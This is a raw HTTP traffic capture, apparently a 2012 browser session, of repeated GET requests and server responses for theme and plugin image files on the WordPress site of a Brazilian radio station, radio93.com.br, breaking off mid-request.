Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /amor/wp-content/themes/novo93/images/ranking4.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /amor/wp-content/themes/novo93/images/ranking3.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /amor/wp-content/themes/novo93/images/ranking2.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/bgDebate93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/submenu_middle_bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /amor/wp-content/themes/novo93/images/ranking1.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/logo93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/votar.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/goSearch.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/searchBar.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/plugins/lightbox-plus/css/shadowed/images/border2.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&amp;debug=true&amp;m=1343672832
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/loading.gif HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/setasSlider.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/uploads/2012/10/ESTA%C3%87%C3%83O-DO-AMOR2.jpg?1351672499379 HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/submenu_first_bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/plugins/lightbox-plus/css/shadowed/images/loading.gif HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&amp;debug=true&amp;m=1343672832
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/twitterbg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:17 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:39:23 GMT
Etag: &quot;e7cae5-63cf-4b68801738cc0&quot;
Accept-Ranges: bytes
Content-Length: 25551
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:17 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /amor/wp-content/themes/novo93/images/ranking2.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:17 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8887
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/downloadBtnIphone.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:17 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:18 GMT
Etag: &quot;e7cabb-1653-4b687f2d92580&quot;
Accept-Ranges: bytes
Content-Length: 5715
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:17 GMT
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/iPhone.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:17 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:36:03 GMT
Etag: &quot;e7cac7-c29b-4b687f587cac0&quot;
Accept-Ranges: bytes
Content-Length: 49819
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:17 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/mk.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:17 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:36:18 GMT
Etag: &quot;e7cacc-1270-4b687f66cac80&quot;
Accept-Ranges: bytes
Content-Length: 4720
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:17 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /amor/wp-content/themes/novo93/images/ranking1.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:17 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8885
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/radio-online.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:38:12 GMT
Etag: &quot;e7cad4-d28-4b687fd382d00&quot;
Accept-Ranges: bytes
Content-Length: 3368
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/sociais.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:17 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 27 Jun 2012 15:00:40 GMT
Etag: &quot;7f6212-74ef-4c3757a763600&quot;
Accept-Ranges: bytes
Content-Length: 29935
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:17 GMT
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/menu-bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:36:16 GMT
Etag: &quot;e7cacb-737-4b687f64e2800&quot;
Accept-Ranges: bytes
Content-Length: 1847
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
GET /amor/wp-content/themes/novo93/images/ranking4.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:35:05 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:17 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8890
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/submenu_first_bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:39:06 GMT
Etag: &quot;e7cae1-4ee-4b68800702680&quot;
Accept-Ranges: bytes
Content-Length: 1262
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/submenu_middle_bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:39:09 GMT
Etag: &quot;e7cae2-3bb-4b688009ded40&quot;
Accept-Ranges: bytes
Content-Length: 955
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/logo93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:17 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 19 Jun 2012 12:48:31 GMT
Etag: &quot;1278fb5-223dc-4c2d2b32045c0&quot;
Accept-Ranges: bytes
Content-Length: 140252
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:17 GMT
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/submenu_bottom_bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:39:04 GMT
Etag: &quot;e7cae0-4fb-4b6880051a200&quot;
Accept-Ranges: bytes
Content-Length: 1275
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/promo93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:38:06 GMT
Etag: &quot;e7cad2-ac2-4b687fcdc9f80&quot;
Accept-Ranges: bytes
Content-Length: 2754
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/bgDebate93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:34:40 GMT
Etag: &quot;e7caaf-1757-4b687f0955000&quot;
Accept-Ranges: bytes
Content-Length: 5975
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/votar.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:39:27 GMT
Etag: &quot;e7cae6-baa-4b68801b095c0&quot;
Accept-Ranges: bytes
Content-Length: 2986
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/searchBar.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:18 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:38:48 GMT
Etag: &quot;e7cadc-582-4b687ff5d7e00&quot;
Accept-Ranges: bytes
Content-Length: 1410
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:18 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/goSearch.png HTTP/1.1

Host: radio93.com.br

